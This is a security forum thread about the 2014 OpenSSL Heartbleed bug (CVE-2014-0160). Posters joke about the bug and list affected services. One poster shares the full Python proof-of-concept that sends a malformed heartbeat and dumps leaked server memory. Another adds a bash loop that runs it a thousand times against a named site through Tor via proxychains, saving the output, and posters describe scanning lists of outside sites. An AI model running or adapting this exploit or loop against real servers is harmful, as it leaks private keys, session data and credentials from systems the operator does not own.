This one looks fun, affects a wide range of servers, so you could potentially be affected indirectly since openssl is the largest used crypto lib out there.
This is pretty awesome
I would hate to be a admin of external facing sites with this shit in the wild.
Its lolz mail.yahoo.com is vulnerable
They never should have dropped support for XP, we’re all doomed!
For once if you’re an IIS admin you’re having a happy day!
Yea because you’re running around unplugging all those XP machines now longer supported today
[sarcasm]I’m sure MS found all the holes in XP by now anways, those machines will be fine[/sarcasm]
PfSense is vulnerable we have been testing a bunch of stuff this morning…
This is going to be super useful on internal security assessments for years
OR
You’re sticking both index fingers in your ears and screaming “LA LA LA LA LA LA I CAN’T HEAR YOU LA LA LA LA LA” over and over again pretending that those XP machines will be just fine for a few more months.
I’m waiting to see what 0day gets dropped for XP once Microsoft officially washes its hands of it I know people are sitting on some.
The fear is the 0day will drop and MS will do some out of band patch and kill it.
Yeah, my guess is that their conscience will get the better of them and they’ll fix the really bad ones.
But like you said, there isn’t just ONE of them out there I am sure. I am sure that there is quite a number of them.
-
-
- Updated - - -
-
blank file, can you get me this script?
This was the original script
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([EMAIL="jspenguin@jspenguin.org"]jspenguin@jspenguin.org[/EMAIL])
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
def h2bin(x):
return x.replace(' ', '').replace('
', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay
def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
sys.stdout.flush()
s.connect((args[0], opts.port))
print 'Sending Client Hello...'
sys.stdout.flush()
s.send(hello)
print 'Waiting for Server Hello...'
sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(hb)
hit_hb(s)
if __name__ == '__main__':
main()
I added some stuff I will post my version up later but I just made it loop and save the output etc however a simple bash script like this would be fine
for i in {1…1000}; do proxychains4 -f ~/proxychains-tor.conf python ~/Downloads/ssltest.py site.com >> site.com.txt; done
It’s not really detectable so proxy chains is probably over kill
cool thanks, I actually got the script from a co-worker. Yeah I wrote a dirty little bash script (could be a one-liner I suppose) that loops through a list of sites and spits out the vulnerable ones. Sourced the list from the EVM platform and scanned everything already.
Yahoo patch their shit yet?
Nope
This stuff is over my head
2 Questions
Who is effected?
What are they subject to?
Mad skills. Such wow.
Everything that uses the secure web traffic browsing. Banks, IM, Website sessions, etc. If you have a vulnerable version of OpenSSL, your keys are compromised and have to reissue certs and a ton of other crap. Pretty much this broke the internet.